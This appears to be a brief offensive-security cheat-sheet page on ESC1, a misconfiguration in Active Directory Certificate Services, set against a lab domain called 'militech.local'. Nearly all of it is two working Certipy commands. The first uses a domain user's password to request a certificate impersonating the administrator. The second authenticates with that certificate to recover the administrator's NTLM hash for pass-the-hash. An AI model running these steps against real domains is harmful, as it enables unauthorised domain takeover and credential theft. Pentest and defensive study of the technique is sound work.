ESC1

ABOUT

ESC1 (from ESCalate) allows any domain user to impersonate (become) a Domain Admin or any other user by requesting a certificate "as them" and logging in using that certificate.

EXPLOITATION

Request Cert as Admin

certipy req -u 'Solomon.Reed@militech.local' -p 'SuperAgent12' -dc-ip 13.13.13.13 -target 13.13.13.13 -ca militech-DC-CA -template UserAuthentication -upn administrator@militech.local -debug

Auth as Admin

certipy auth -pfx administrator.pfx -dc-ip 13.13.13.13

In the result we would have administrator's NTLM hash we could use for PTH.

RESOURCES

Last updated